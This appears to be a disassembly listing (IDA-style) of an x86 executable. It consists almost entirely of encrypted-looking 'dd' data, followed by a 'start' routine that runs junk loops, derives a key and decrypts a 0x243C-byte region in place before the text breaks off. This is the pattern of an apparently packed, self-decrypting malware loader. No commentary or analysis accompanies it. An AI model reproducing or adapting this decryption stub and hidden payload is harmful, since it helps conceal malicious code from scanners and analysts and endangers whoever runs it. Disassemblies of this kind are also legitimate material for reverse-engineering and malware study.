dd 0AA52D087h, 7A27EFF3h, 0F4F11804h, 7651AEBBh, 1D074055h
dd 0DEBEC4CCh, 96DCEE40h, 33B64EA8h, 7075BD34h, 6CC70E0Eh
dd 30D1BC5Eh, 7DAEB138h, 174260F2h, 2D453D39h, 4BB0107Fh
dd 1233E279h, 8EA4ED5Ah, 0D76EC1C7h, 4D6BA6D5h, 432BCBF5h
dd 4372265Fh, 152C8148h, 1E2CC805h, 74DE0556h, 0C8DAEB56h
dd 11A4A930h, 2C52DFC1h, 0C0D1750Eh, 0C6A45003h, 0E5338BE4h
dd 0B7AA03C7h, 80333EBFh, 9489BAF0h, 0FDCE969Dh, 0BDF95CFh
dd 8444F44Ah, 3E63DED0h, 93638ACFh, 0A4A0B8BBh, 0D0F7078h
dd 5F34C0C5h, 37092AFFh, 0D0FFAEEAh, 366724D3h, 9205C742h
dd 4ED859Bh, 0A6A4DE48h, 0B5D6FC2h, 0DF35CDD5h, 8966EBF4h
dd 580FD7D8h, 57B1D1B8h, 7C16B184h, 566734ECh, 3C3E6267h
dd 3131F904h, 0ADC46669h, 5D5A821Fh, 79792815h, 226EADB5h
dd 5F394B4Fh, 3924C00h, 7A5B90AEh, 647A8A66h, 9C8A302Ch
dd 7644290Dh, 0B3B0F8FCh, 7B9E82E4h, 793F84B8h, 0D4A232D5h
dd 98CE063Bh, 603EB84h, 7370289Ch, 0E0DDA5AAh, 4D4B1318h
dd 0BAB88085h, 0D776BBA3h, 0A5B983F5h, 0AEA66CCDh, 9419F4BEh
dd 801A4F45h, 2C346E56h, 0D3D91DCFh, 4E43A68Ah, 0E2FA3539h
dd 9D9E9095h, 19006742h, 0B4D6EBD7h, 26367863h, 0DEB10D1Ch
dd 4C6C9299h, 0CE8B3D3Dh, 8E99A5B7h, 0B0F6857h, 97D3DAFAh
dd 35206C7Eh, 0C2C7301Ch, 6C7AAE83h, 0EEE63924h, 84B6BD80h
dd 6174A4Bh, 0B3BFEACBh, 7C4D756Dh, 0CFD93075h, 4A7D9483h
dd 0F1EA2035h, 809AEED8h, 5F04494Fh, 0ADA8E7D4h, 516F6670h
dd 0C2C91503h, 71679EDEh, 0D5E73E2Dh, 8683D8D6h, 682D4943h
dd 0A9A4C1A1h, 5A507370h, 0DAE06D19h, 7846AEB3h, 191E223Ah
dd 9E89F3B5h, 32364B64h, 0B6B3FBCEh, 46419E95h, 9FE01A0Fh
dd 4B7AB390h, 291E2F2Ch, 0E78DCADBh, 12227B58h, 95A6E7E5h
dd 2F559590h, 0D1E90020h, 667FB6BBh, 1B1E7927h, 8985E2CAh
dd 16525B79h, 0D1F2F3ECh, 49408192h, 0FDF7002Ch, 747ABBDh
dd 27075E78h, 8494DBD5h, 3C275274h, 0D4CFE0E3h, 29698981h
dd 0C2E13826h, 4272A7ABh, 3F0A5B55h, 9FB9C9C8h, 3F2F5516h
dd 0C8DA1AD7h, 4E508DA0h, 0F6D6591Fh, 729B90BFh, 3045A4Bh
dd 0AEBDE7A5h, 34346B44h, 0F1DD1416h, 6520A994h, 0E0DB213Fh
dd 9997B7ABh, 60E5E7Dh, 0A2B4F0D3h, 22D6467h, 0C4D53F7Bh
dd 7A738CBFh, 0CFF92539h, 9B92CDAAh, 1C174244h, 0BDBEDD9Dh
dd 7E2C6968h, 0CFC2191Bh, 7B75AEE4h, 0E5EE0336h, 8D86DDCDh
dd 2F2A6Dh, 0ABA6C1E9h, 7D5B4A71h, 0A8CF1E1Ah, 7872AFAFh
dd 0E6E82508h, 8081D8F6h, 1C384941h, 0AFBCDB95h, 5848526Ch
dd 0D7D40A0Ch, 7D668CDCh, 0CF22C29h, 85A88484h, 59285756h
dd 0A5A6E3C1h, 7458D9Bh, 0D9C6255Eh, 6A42D8ADh, 153B2126h
dd 0BAEAD7D8h, 3F1E5444h, 0B784E8E2h, 535B888Fh, 0EDFA131Ch
dd 695FD497h, 15100730h, 8F89FED4h, 21316870h, 0B4A4DA8Bh
dd 4B429FBEh, 0FEF60A32h, 6C6483D3h, 23754D24h, 9383C7C0h
dd 2735714Dh, 0D4FBE3C7h, 7D2A9799h, 0EDE32D0Ah, 6A45A0B1h
dd 73125652h, 94B7D4FCh, 2125527Dh, 0CEF781E0h, 5D4C8AB3h
dd 0E7C32F13h, 6F69BEA4h, 308525Eh, 0B8B1CDFCh, 3E06107Bh
dd 0D6D00FC1h, 4C648F9Bh, 0DC8F3231h, 9A8E87BEh, 3C0F4656h
dd 0BCB4F0D6h, 8457E62h, 0D6C0390Ah, 717A938Ah, 0EBEF3B2Bh
dd 83BCB2B5h, 2B136133h, 0A1B5F9D2h, 21275968h, 0C1C01E0Eh
dd 5068AAE7h, 0E3DF2134h, 91B9C9A7h, 1007497Ch, 0D1BFF6F5h
dd 4E707347h, 0C2EA1A13h, 5719848Fh, 0E3F60125h, 9C81EBD0h
dd 13124C48h, 0A8A5F9CCh, 4E72046Bh, 0C9CC013Dh, 6175BB8Ch
dd 82ED2424h, 9DA0CCF4h, 3F3B5248h, 0BBA2C5E0h, 5A587475h
dd 0CCCB0B23h, 5F13A2A9h, 1BF5193Dh, 92BECCC4h, 353E5750h
dd 0AAAEFED9h, 4754908Fh, 0A0CC0502h, 7C58A396h, 2D19302Fh
dd 9D9DC3DAh, 301A7341h, 0BBB6E3E0h, 5C45ABFAh, 0FEF7083Dh
dd 586EB7BAh, 16113237h, 0A48AF9D7h, 13A6873h, 0D1A9FAFEh
dd 7E7AF590h, 0FBEE3124h, 7872BBA0h, 1A185F40h, 8D92CCDEh
dd 3B2A7C79h, 0D2D3E787h, 5E4A949Ah, 0E3F33962h, 7170A4A7h
dd 131E415Fh, 0ADDDC0C7h
dd 4C3D7072h, 0DDD6E5F7h, 444A9EF1h, 94E63F34h, 648BA985h
dd 1A095A4Bh, 0A8B6CDE5h, 26264776h, 0B5D110E4h, 465587A4h
dd 0E4EB3829h, 0BE8FA68Fh, 0F075F5Ah, 0B3B3EAC1h, 3025785Ch
dd 0DFF87919h, 716C839Dh, 0FCC42732h, 0F9B9AEA1h, 3124078h
dd 0A7B6F5ECh, 2E247944h, 0ECC2042Dh, 6F75AAE5h, 0EDE62236h
dd 9490EFB4h, 0E0A6D49h, 8B9198FFh, 756E4751h, 0ED854147h
dd 4518ACADh, 0E8C62A2Ah, 0BA97C9D3h, 0C60514Ch, 0BB82F2F3h
dd 5D706D66h, 0E4D03509h, 74708FDDh, 0F2E73F1Ah, 818EE1C1h
dd 22184050h, 0A29892D3h, 4152AC98h, 0D7C80D3Bh, 51699CBFh
dd 7897C548h, 82BA7B9Eh, 0BF592122h, 0C7E2C202h, 3759FB96h
dd 0F5F3383Bh, 5DC15ED2h, 2E2A96CEh, 0B5B6EFD8h, 0C9C0E24Ch
dd 42C2BAA0h, 0BAD0FB3Dh, 9CAC48C2h, 0C9011557h, 0DEF3B315h
dd 0D7E39BBAh, 513B49E3h, 2B4188E3h, 2C1BDFBFh, 1D97A0E1h
dd 705CD41h, 1426526Fh, 3554A7ACh, 82C61573h, 0BBD2C2ECh
dd 4327FFF3h, 96FE0E63h, 4619DA6h, 206E5C3Ch, 4B24F3FAh
dd 4B793D9Bh, 2D4927DCh, 2613C03Dh, 0CFE4A7DBh, 157D4840h
dd 61893208h, 0CAD70A28h, 96460D22h, 664D2928h, 0E626267h
dd 1546Ah, 0FCF9DAFFh, 96987BDCh, 4751175Eh, 0CE423A22h
dd 0B0B4F2F4h, 0E15F0CE8h, 0E02AEA9h, 0F8C69242h, 7EE8A3BDh
dd 0E039999Dh, 0B4C0F8F5h, 9C80F1F2h, 6ED964E4h, 1E09C359h
dd 1CF3BBA4h, 9E9ED631h, 0D915112h, 3B3CEC53h, 29F47173h
dd 260C580Dh, 0E4A784Eh, 0C0D0583Eh, 0C0A7728h, 9B9AC3C4h
dd 1B3894FDh, 0A0216E5Fh, 0DF8624F8h, 22807861h, 0B9EDB175h
dd 595B23CCh, 2B49CD91h, 3405E74Bh, 342F9506h, 0F3FCD59h
dd 5CB11617h, 0E9C3B190h, 305BDBA2h, 0D9020949h, 11FCF9CBh
dd 8456E3AEh, 0C2FD3E6h, 0BA25406Eh, 0E78FACDBh, 20AC28E1h
dd 45D5778Fh, 46DD8138h, 9B9A626Dh, 0A5C1F58h, 0C3F90011h
dd 0E3D1B34Ah, 5143AD90h, 37378488h, 2B29F0FDh, 53BDA660h
dd 0F5C840B0h, 76045998h, 0B2847ECh, 428C90DAh, 0E96C0BD2h
dd 7C752179h, 0C7C31A0Ah, 970038A7h, 6F5C18A7h, 57D56524h
dd 796B0681h, 35635781h, 23E6EE04h, 91665636h, 3DF89440h
dd 479EA45Fh, 5CD39E93h, 85770418h, 3BABC93Fh, 1032117Fh
dd 69A458h, 452A187h, 0A4875BFBh, 0D4D373CAh, 0C01C090Ch
dd 9EB50094h, 0E78668E6h, 0A886078h, 0F6FD99BDh, 63DAAF21h
dd 3C51989Bh, 3D3E0400h, 0ABAF1B21h, 8DE7E0E2h, 85B56179h
dd 767F4636h, 5F612C0Eh, 0CCA7C597h, 393B07ECh, 0F2FA2671h
dd 81EA8ADEh, 81B26669h, 79627E8Ah, 5B5D2422h, 0CAA0C3C2h
dd 5D396A51h, 0E2A56D6Dh, 0E1872588h, 0EB7F7763h, 0B1984230h
dd 53327672h, 93C78F8Eh, 12104803h, 60A16968h, 3D220F42h
dd 0BAFE1A45h, 0F30BA6C6h, 3E82954Fh, 9692D98Ch, 5AA507AFh
dd 0C59D554Bh, 0DA7F1251h, 0BAE2C014h, 69E49C84h, 6005E4Bh
dd 33E7C3E3h, 2C2DF061h, 59AACA64h, 0F45FDEBBh, 24236B94h
dd 0B1B0F8FCh, 0B7DBE94Bh, 3ABBB3ADh, 292AF837h, 0B2E1A261h
dd 0CD9735C6h, 226F0710h, 0F2153156h, 89171226h, 86377F87h
dd 602599FAh, 86EDD4D5h, 191DC6FBh, 7D6BA6B5h, 0BDBA095h
dd 0C394F144h, 4B3B74BFh, 2D20E8ECh, 8F8DA5DEh, 0C6C442C7h
dd 0E92E2041h, 52DA9D9Fh, 43430BEFh, 0C59046FBh, 209CA319h
dd 0CCC41B06h, 377C9DB6h, 2A646BF6h, 0B88354B6h, 6C16590Ah
dd 806CE088h, 2143E2D4h, 38024093h, 1DF4BCBFh, 61622A9Dh
dd 9C9FA918h, 0BE32534Fh, 0A8AA72D6h, 0BA1F1963h, 78B4172h
dd 0F0F1B922h, 0AE2A0714h, 0C5F6A839h, 373A8E87h, 84AAC26Fh
dd 2F34FCFCh, 0BE42E6Bh, 0D042C9C2h, 0D8205104h, 0AEE96EEFh
dd 45438A8Ah, 0D1A015EDh, 7A3FF7E3h, 833A832Fh, 53DBBDB4h
dd 56580731h, 3C976F79h, 11E936Eh, 0CE5F5469h, 0E45C8486h
dd 7979414Dh, 8891C1F5h, 37357372h, 1154768Bh, 0AB2EC6D4h
dd 0A8AD17A6h, 0F28D591Ah, 27750D6Dh, 0E3E1AAC6h, 601499Fh
dd 68287AD8h, 0A62AC2D9h, 0A88C2FF6h, 0CF379CD0h, 2121686Ah
dd 7521F7FAh, 4D7C3819h, 459D8502h, 180D2367h, 1550A360h
dd 3315A740h, 0B394343Bh, 0D9FEFE23h, 4A4810FDh, 5A342082h
dd 2512F792h, 0A2CCEAD6h, 4A77C4FAh, 6C5A027Ch, 545C64A7h
dd 46753D56h, 3639DF8Dh, 212FD7A8h, 0BEB3C1D2h, 7EFAC1F6h
dd 68571F04h, 5DBC9E29h, 0BD420A1Eh, 9F831EEFh, 41D50FE7h
dd 0E3FF3411h, 0A7AADBA1h, 0D175547h, 9CBDF8FFh, 4C506A6Ch
dd 799F740Fh, 0EF4B2E68h, 67051C88h, 0F0B3D1BDh, 0A337ED2h
dd 767B1B80h, 833C3418h, 0A7A97165h, 0EB5BDA52h, 0E47CB4B2h
dd 0A2F43511h, 5C5E2627h, 8E4638F2h, 0D20BAA05h, 410D08C2h
dd 22865620h, 2A807879h, 14BFB3DCh, 6877BAB6h, 0E1BC1B90h
dd 2BF17EF5h, 25ADAAEEh, 0E0FD67Dh, 5B14442Ch, 0BEE9B1B2h
dd 0C0A8144Ah, 0C2F4A02Ch, 0BB3DA771h, 177626h, 0B3BE3E2h
dd 4843CDCAh, 664AD80h, 5DACEB1Dh, 0BFAADBDBh, 98D2F39Dh
dd 9AAA5256h, 24425A2Dh, 8A243C70h, 0D2D19A18h, 82DAE81Ah
dd 0E4BCB4ACh, 25BA3171h, 97970AE6h, 3E82ADCFh, 7E046270h
dd 0B2485AF9h, 0A54B233Bh, 0B9B881C5h, 27ED537Ch, 239D5A5Fh
dd 7572D982h, 6A042B08h, 8CD9A1A7h, 64669AECh, 0E2E27CB0h
dd 8C87C12h, 0D305566Bh, 7638C0F4h, 0B96A4965h, 5CF6EC29h
dd 70C91445h, 0B21C284Fh, 1E66672Ah, 0FEEE0032h, 0B1AC5B0h
dd 4FCBC568h, 0A158BF92h, 0B342502Fh, 0A2B224F3h, 1855E752h
dd 0ABCDB80h, 0BB7E4EC3h, 5DD6A225h, 44D0A8AAh, 0B8B3D31h
dd 0DBAB4344h, 20ADCB62h, 0BF857D7Fh, 0C1C28109h, 2FE32729h
dd 0F8326A69h, 7B8E8AC3h, 2CA84040h, 23259A50h, 0EAD21A4Bh
dd 0EC85E7BBh, 5A5D254Dh, 4235C512h, 3507EA87h, 8955F992h
dd 9DEED9EAh, 7D4E5330h, 0E5144B36h, 0A8A61AA6h, 0F7430770h
dd 5833CBCCh, 0C9A0026Ah, 6C982A87h, 0F17A7269h, 0D7D7E837h
dd 56B5DC1Fh, 0C1A8DADCh, 3126206h, 19156457h, 0A39E19Fh
dd 771CEAC9h, 0B4D154FDh, 6162ACE3h, 2B4186B9h, 2C1BDFAFh
dd 0A9ABE5EFh, 38CCDE1h, 0B9E7C51Bh, 6ADF9787h, 0FBC6294Ah
dd 0BB8AB2CDh, 1D3DBB78h, 3BFA2EAh, 431F9F9h, 4129BBB7h
dd 0F576A399h, 0B1ABBAD4h, 0A5C2FB0Eh, 7772EBC0h, 0C2C1080Dh
dd 2CFC5034h, 923A3208h, 0EAFC5230h, 3460CE12h, 0D1885045h
dd 4E7D8682h, 0CFB6303Fh, 909CA9B4h, 47551C58h, 0FAB8F0C5h
dd 10423B23h, 0F5FB2422h, 6B5FB8A5h, 0E5EC2324h, 9699FDB7h
dd 90B5E44h, 8EA5FCCEh, 494D6259h, 0DFC9171Eh, 7B71B2B8h
dd 0C6E22B20h, 8796D8DCh, 31755Fh, 0ABA3F7EBh, 484E6172h
dd 0DAC0372Fh, 7A77A985h, 0EFEC1B22h, 0AC89DBD2h, 333F527Bh
dd 0AEB9F2F1h, 51567352h, 0F8C30206h, 7A67AE9Dh, 5E93A25h
dd 9CACD1D2h, 3A324F54h, 0A9A1E4F0h, 78698E90h, 0A1D61905h
dd 5B49988Ah, 392E0510h, 8A80FCE8h, 39247053h, 9498F8E8h
dd 5E559792h, 0DDC2151Eh, 6979A1A3h, 1C2E342Ah, 898CDEC3h
dd 2B164770h, 0B2AFE4FBh, 7A2D879Dh, 0FEFD1007h, 7A6887A7h
dd 76763C35h, 8E23F9AEh, 223F7DD5h, 0D0D5FCE7h, 405D9FDBh
dd 0E8FA3011h, 686AE5B1h, 3D705758h, 0C096E6E2h, 3F25786Eh
dd 0C0CEF0F5h, 6D76B8F8h, 0DFE47A32h, 22B18E82h, 1D05421Ch
dd 0D6EAD4D3h, 4947E741h
dd 37E97C81h, 14010F03h, 0FE0B905Ch, 0FEFBF3DCh, 4744A4C9h
dd 30179E93h, 2F15780Fh, 5304F263h, 791ED6C1h, 0F8A56FF4h
dd 0C479A6EFh, 441333CDh, 0F8222612h, 37CA093Ch, 0C80B217Bh
dd 129E6E43h, 688607Fh, 0C6DE8944h, 25EAD12Eh, 2E9E1461h
dd 0DF3FB7F3h, 551EFEBAh, 7018D0CEh, 85854C54h, 0CB6745EBh
dd 0B6601806h, 0CCCD951Eh, 2C928689h, 0CCF87041h, 0EB1BB7DEh
dd 0B1AE03D9h, 0CA9334B9h, 2A28212Eh, 0C8CA9A7Bh, 767E5300h
dd 0EEE92943h, 0D8725DAh, 767F7764h, 80F8C075h, 3FB27220h
dd 3B387076h, 21F2569h, 0EB61EC6Ah, 0E5DE29D5h, 7A7B434Eh
dd 0B8ABF6E1h, 10784D50h, 3EC3C7C0h, 1F1CE56Ch, 65DC8D67h
dd 0BF872D2Bh, 774713BDh, 0E4E5A8C7h, 0C4AD4C1Ch, 0BE8FABA8h
dd 2C2CF91Eh, 0CBDD3D64h, 55439898h, 2036676Ch, 1EB6A8EFh
dd 7E65FF8Ch, 0BBBC6B86h, 6174F0F3h, 0C5C10E2Eh, 91FD9CCEh
dd 715F1CD5h, 8F8D6D9Ah, 211B117Ch, 0B8B71782h, 0D972ACF0h
dd 0A3BAA8CBh, 0FF0645CBh, 0E03B104Ch, 0EAF45F30h, 0DCCB8312h
dd 0DEB34B58h, 3848BAECh, 0DE8D555Ah, 896F3D97h, 96680018h
dd 0E6FE5034h, 4348E30Eh, 0E3E5787Bh, 2C2EB7ADh, 0C7C61678h
dd 0B96240C3h, 8D651D1Ch, 0D2D29A97h, 4D307B7Dh, 0CAD91B1Eh
dd 0E54AE2A5h, 0B7AC96C7h, 117135BFh, 6E621A07h, 9C421AA8h
dd 0B23D351Fh, 988685F6h, 83E88EE0h, 83B4600Fh, 0F0F5D128h
dd 0E8D22728h, 0CAFC8DCAh, 0EA878F5Bh, 4CA75F43h, 0EDEB2E20h
dd 0DB048E2Ch, 0ECEE8697h, 0FFF9A774h, 0C6C9A1B1h, 14526B73h
dd 0F5F36B5Ch, 0F7AD9B3h, 7C7F2D15h, 7C1532B4h, 56680CC0h
dd 0B69F4D0Bh, 0A6BF77D9h, 0CC9F5749h, 0B981D2BCh, 794961E0h
dd 0B6B6F8E5h, 0C6AB4E4Fh, 0C0F1A56Eh, 0F3BB09A0h, 5D9B534Ah
dd 39262E56h, 189D3D41h, 1C1D555Ch, 60426596h, 0F1384288h
dd 7D2AC2E0h, 70A40037h, 0F9FB3E89h, 663DBCF9h, 0B488A69Bh
dd 7A42047h, 7D467E77h, 1833A277h, 0CAEB0D60h, 0F13B20F9h
dd 0F5AACAC4h, 0DDEAB7E4h, 1E3E7543h, 3238B4B1h, 2512DAA0h
dd 0C3DE060Ch, 0AEAD959Ah, 405FA7C8h, 4C289F94h, 4675213Ch
dd 0C6AD92BFh, 21130F9Fh, 0C6DF5459h, 0ABB8968Ah, 2423017Ah
dd 402B9CECh, 4272264Ch, 0AFAF7B92h, 4E54B7E7h, 0EBDF2530h
dd 0B693CBAEh, 0F19B7C2Fh, 0D1E1B245h, 0C18A8A9Ah, 0C3AC445Ah
dd 1919E12Bh, 79862407h, 0C3DFA22Bh, 0B2F4A42Bh, 40CEA687h
dd 0A11C3B8h, 0F0FB2772h, 3EF34B20h, 46004B7Dh, 6535B6h
dd 0C5E1638h, 9FCAF9C3h, 363B6953h, 7059EE6Eh, 0EEE9C633h
dd 4C3DCBB6h, 0EBED85A3h, 0D0332857h, 3AC89083h, 3199468h
dd 0A0AE826Bh, 5D58D7D8h, 48370709h, 0A4AD9F81h, 0C0A81F6Ch
dd 0C2F4A0CCh, 30369169h, 28136668h, 0B3BCB63h, 0D5C5CD1Ah
dd 0DE59D9Ch, 0ADACEA91h, 0BFC08462h, 6364A2F7h, 0CEDF2C2Ch
dd 444B8BFCh, 34E1C340h, 67E19981h, 7ACB18DAh, 2FBC8485h
dd 2A29F49Ch, 6323D362h, 5C03FBD7h, 5EB985B0h, 8A35A59Ah
dd 0CFB4ECE6h, 89944D39h, 0A32AEDF1h, 9492584Fh, 6F2B4Dh
dd 6383439h, 0DBD9A0A7h, 64EA9AECh, 71357CB0h, 2321E87Dh
dd 0FA5ADD0Bh, 680491C8h, 6A591DF8h, 0A28F5E27h, 57CC6402h
dd 244E797Ch, 1F2ECA80h, 3108B1BCh, 0F9C8E062h, 0EB4F5B31h
dd 0E3F3311Bh, 0D5BE590Bh, 0AD9E5AC1h, 9F142360h, 888851DAh
dd 7EF9FD4Bh, 0ED53D42Dh, 0FFF03E1Fh, 0C2BBC007h, 0A8AB435Ah
dd 1672E08Bh, 117A4F25h, 0F1C29679h, 519FD0AAh, 0CBCCF512h
dd 0ADB69003h, 0A59850D2h, 4047CDB7h, 0AC37DFB4h, 2D6AB788h
dd 5B1DA02Ah, 7A479292h, 3507DF3Bh, 0D34C64DCh, 78EE262Ch
dd 7D7E46DCh, 630D98EBh, 0A80D0516h, 0F4EABF1Ah, 0E08E76FCh
dd 2EA0584Ah, 0FB5F3DD6h, 0EFF7BDBAh, 0E7D78F0Dh, 403D1D75h
dd 93C28A8Ch, 0EEBA08AAh, 119C544Bh, 871DF590h, 474671D7h
dd 52ECFBAFh, 75159216h, 0B65E479Dh, 3E2AB9F4h, 0D38A622Eh
dd 2341C6D2h, 7B93BA37h, 0B0D7476Dh, 5E695112h, 36EAB079h
dd 190B104Eh, 9688B461h, 2A24C9CEh, 5F4E4E0Ah, 0E4FB8D89h
dd 656C3433h, 0C09306BBh, 2C50CED0h, 0DDD91714h, 0FFAAC5EBh
dd 5D41D7ADh, 76131EA5h, 2D450D12h, 0E7E52A7Fh, 0EDE7213h
dd 207546Ah, 0FCC9D4F5h, 72842F5Eh, 87D955CAh, 43420FE6h
dd 0D48A517Bh, 0E14BE4E2h, 0BBA2B4C3h, 0F4323DC3h, 0D6FC760h
dd 0D2D19995h, 1FE7BA87h, 0FFFB7447h, 36D8741Bh, 47034E62h
dd 417EEFC1h, 615105D3h, 0DBFC331Ah, 0B63C0436h, 98878FFEh
dd 7CD8F5E0h, 0D0D51A4Eh, 0DC4D2D44h, 0A5DD2618h, 5BE4ED95h
dd 82B4FF89h, 0A4964290h, 0BCE1D66Ch, 97E0583Fh, 131243EDh
dd 0BA4C5145h, 0C7BF1D98h, 0FBBE1715h, 1C2FA447h, 0F3FFB26h
dd 8BFBE0B4h, 16BA085Fh, 667BAEB4h, 0AC790C8Eh, 3031C9EEh
dd 0AEF64C1Dh, 0F30BD3A3h, 495429D1h, 18582DB1h, 53532B30h
dd 450799FFh, 2E1DD55Eh, 9B9A6266h, 27F94A15h, 9F743C71h
dd 1C1E57A6h, 504BD546h, 93433105h, 0D47FF1C5h, 0A8BA53F6h
dd 0F9FB48D0h, 73CBBC31h, 6554A5ABh, 4D7B231Bh, 45EE80EFh
dd 1809B067h, 9A52DF60h, 2FF6349h, 3FAC1F3Ah, 8CDACBF7h
dd 492F0E7Eh, 0E0747C81h, 0FD07C11h, 690D566Ch, 0CC7FCC36h
dd 0E2693132h, 0E8E69926h, 4EC98110h, 3FB1494Dh, 102EF57Fh
dd 0E7D90258h, 6F0790C5h, 67560227h, 0DB2C631Ch, 41450988h
dd 51AE1C79h, 2C2BE453h, 981DAF54h, 75F58DEDh, 0E76CD4D6h
dd 0D0D09B72h, 0D258381h, 63987345h, 484923E1h, 0D4812701h
dd 0C2F50F42h, 0CA9F281Ah, 0CCFDBE62h, 0BD34C381h, 0A6A873B4h
dd 919C14EDh, 81B27A53h, 86BEE6E8h, 5B522539h, 8D5F6DC3h
dd 0B038302Ch, 0DC2162ADh, 9912DAD9h, 4D4F64CDh, 0A16777B5h
dd 37099A1Ah, 16F48F8Fh, 0C3C33DFFh, 1A28889Dh, 0D3EE6F8h
dd 0C24708CEh, 0E7E8AB7Eh, 9555CC2Ch, 20347A7Bh, 1F177D70h
dd 935E6557h, 0F30C9963h, 24FA09A1h, 0A753A3B7h, 18821908h
dd 0BD9746E2h, 73167526h, 60F70813h, 844FD0A5h, 6723745h
dd 0DDAB2373h, 4D5A5492h, 0FF3693C4h, 0F0DF0FBBh, 13AE9C42h
dd 432FAD5h, 35E46EFFh, 5655A88Dh, 4B4A12AEh, 8974BFB0h
dd 160ADBC2h, 0A2BF6970h, 4B8A88EBh, 1D075D4Ah, 0B4B18EC4h
dd 4D4B6174h, 0D2DA475Ch, 474D899Eh, 0ECFF267Ah, 8892E0FAh
dd 46524040h, 9DA1D38Eh, 332F657Ch, 0DED9561Ah, 6C328A8Eh
dd 0E2B57D35h, 0D8D58EFEh, 11014447h, 0F2E3A7F5h, 58296D62h
dd 9D90011Fh, 636E91C4h, 0A5BA2A3Eh, 9086D3DDh, 51585849h
dd 0E1F3A9BBh, 5A4F636Fh, 0A594171Eh, 9DE954EAh, 0B3B457C3h
dd 73BF09BBh, 0F3AD23C1h, 0F54D9DE0h, 59484976h, 2F649B1Ah
dd 9995722h, 0CF81797Ah, 0E907358Bh, 0B7298AD6h, 0B3E6AE11h
dd 35717509h, 7E7CB449h, 4052E506h, 94081C03h, 11499FBh
dd 5658220Dh, 0C3C5D5E6h, 0C0DAA1FBh, 0EA609894h, 17815FF6h
dd 0F4797174h, 29CDAF85h, 60689150h, 47657A76h, 2F507B21h
dd 0BC2ED6EBh, 0FAF4D0E3h, 0B9FEFEE5h, 5E6FA145h, 506036E4h
dd 8E620E74h, 4A165E3Ch, 0E2AB5911h, 2628CEA7h, 72D0594h
dd 94F09A47h, 384C28C5h, 3184626Dh, 7BA328F3h, 95936B50h
dd 46588DF0h, 4D5F413Bh, 0DD88E1FBh, 0B56D3B61h, 8AB5827Dh
dd 256FBEA7h, 0C2B24529h, 8BFC9482h, 3F2B0F3Ch, 5CD89FF4h
dd 0B9BAF350h, 83E1FF80h
dd 12F4E7DBh, 7172CBB0h, 0C6FA4A39h, 2B296664h, 2BF318AFh
dd 157FF5F2h, 0A0E12239h, 0E2E2F863h, 0C9DE6CAAh, 73F98CF1h
dd 9B9BD23Eh, 8582C9A1h, 38BB0846h, 98538B88h, 0E4370938h
dd 289B1AEh, 0C0C4647h, 7689FB18h, 25CE9698h, 0C5C3FA5Ch
dd 0A7A9719Ah, 0F89783DFh, 82B36274h, 0EFF18A53h, 6EA14227h
dd 0F9E8261Fh, 0BF5D0131h, 0F01BEE4Ch, 1013EBEBh, 0D068423Ch
dd 2124A48h, 585B2230h, 88F611F6h, 3BB0F2A7h, 2BA26A6Ah
dd 0D00CEB86h, 2B47C520h, 106CBEF6h, 0A2571F20h, 0E2C49ACEh
dd 0B53EF9FAh, 9D9E6683h, 9579023h, 7899C44Ch, 9B64ADB0h
dd 72733B3Dh, 6B4487AAh, 0C52DF5F7h, 65659FC2h, 8CE4DDDh
dd 37FF3C40h, 0F2AB22A5h, 4B3CD631h, 0B95744B4h, 60A039F7h
dd 0BC13D772h, 0ED03FBFFh, 8D8FC56Bh, 0DFDD0A42h, 6BD69817h
dd 0BAB8B0B4h, 1715C66Ch, 68FCB25Fh, 85F03833h, 6E6C34B6h
dd 0EBFA142Dh, 16CC0F23h, 5D6A7FBCh, 0DCDE14BAh, 0DA0F2B29h
dd 0FDFBA3ECh, 3C97BAD5h, 5AC2E4A1h, 74540CBAh, 0A1CB7A7Ch
dd 1F181550h, 29780457h, 0FB1BC175h, 38398AC2h, 41E294CCh
dd 40C38E86h, 24C87678h, 0E4E47875h, 6D58B8ACh, 7EAF423Fh
dd 28602767h, 0C991158Ah, 0B516452Ch, 0A9AB2CF3h, 375E27E1h
dd 0A4A56D6Fh, 7ADAF135h, 0DBEB3863h, 0CBFDA5B1h, 4B33493Ah
dd 0ADE2F973h, 90059FDCh, 0B821228h, 0DDDF983Dh, 521F2425h
dd 0F49AD193h, 17BC9B2Dh, 0FAA6E309h, 20166459h, 727E4678h
dd 15172731h, 74ECDEDDh, 3BC6BEBFh, 21F9669h, 8015976Ah
dd 0F20DE5E7h, 4A518FD0h, 0EC6A22B2h, 0D9552D2Fh, 0F1F29919h
dd 457DA6F9h, 9B299B67h, 0F509E1E4h, 475A5BD7h, 0E35654AFh
dd 0AE51292Ch, 8E954B1Ch, 0D39E7EF6h, 6698504Ah, 3735CE64h
dd 0E18D6C3Fh, 0E1EF8BF1h, 7E4AB09Ah, 78BA82B6h, 2927EF1Bh
dd 97FE0161h, 2EEC244Fh, 8136360Ch, 0A65E62A6h, 0CE492103h
dd 7035BD43h, 0E72C1B0Fh, 0A38520DBh, 10C006CBh, 186A1838h
dd 0A656F9B9h, 36290136h, 5CD2690Ah, 0DDE01828h, 0D464512Fh
dd 14063E3Ah, 9698D0E6h, 0FB2BB2C0h, 51765C76h, 0B0AF52C3h
dd 0BBF484E8h, 0FE76AEA9h, 0DCB235FAh, 9AD1A100h, 59D1A9B3h
dd 0BE590F5Ah, 0DFAE724Dh, 1A71B7C1h, 0C86B152h, 0A6F3D17Bh
dd 0C8F4D67Ch, 4DCEA6B5h, 5BD0CC2h, 0F4964E2Fh, 0D095DD95h
dd 7E8BA34Ah, 8F184744h, 3CA1D9D7h, 0CABF2B56h, 86D20102h
dd 0A4A641D7h, 120333DCh, 5F42484Ah, 0ECDD0DB7h, 5AB32324h
dd 4C89091h, 60B8FDDAh, 8F6F6648h, 730F2F5Ah, 7C94245Eh
dd 62E9B1B4h, 0B673B75h, 2E459605h, 3101D24Ch, 61706181h
dd 8C9B229h, 150Dh dup(0)
; =============== S U B R O U T I N E =======================================
public start
start proc near
; FUNCTION CHUNK AT 31438073 SIZE 000000A4 BYTES
; FUNCTION CHUNK AT 31438133 SIZE 0000000F BYTES
sub eax, eax
loc_31438002: ; CODE XREF: start+8�j
dec al
or al, al
jz short loc_3143800C
jnz short loc_31438002
jmp short loc_31438073
; ---------------------------------------------------------------------------
loc_3143800C: ; CODE XREF: start+6�j
sub ebp, ebp
sub ecx, ecx
mov cl, 94h
loc_31438012: ; CODE XREF: start+14�j
inc ebp
dec ecx
jnz short loc_31438012
call sub_31438038
add ebx, 20h
push ebx
mov edi, 243Ch
loc_31438027: ; CODE XREF: start+33�j
mov al, [ebx]
sub ax, bp
xchg al, [ebx]
inc ebx
dec edi
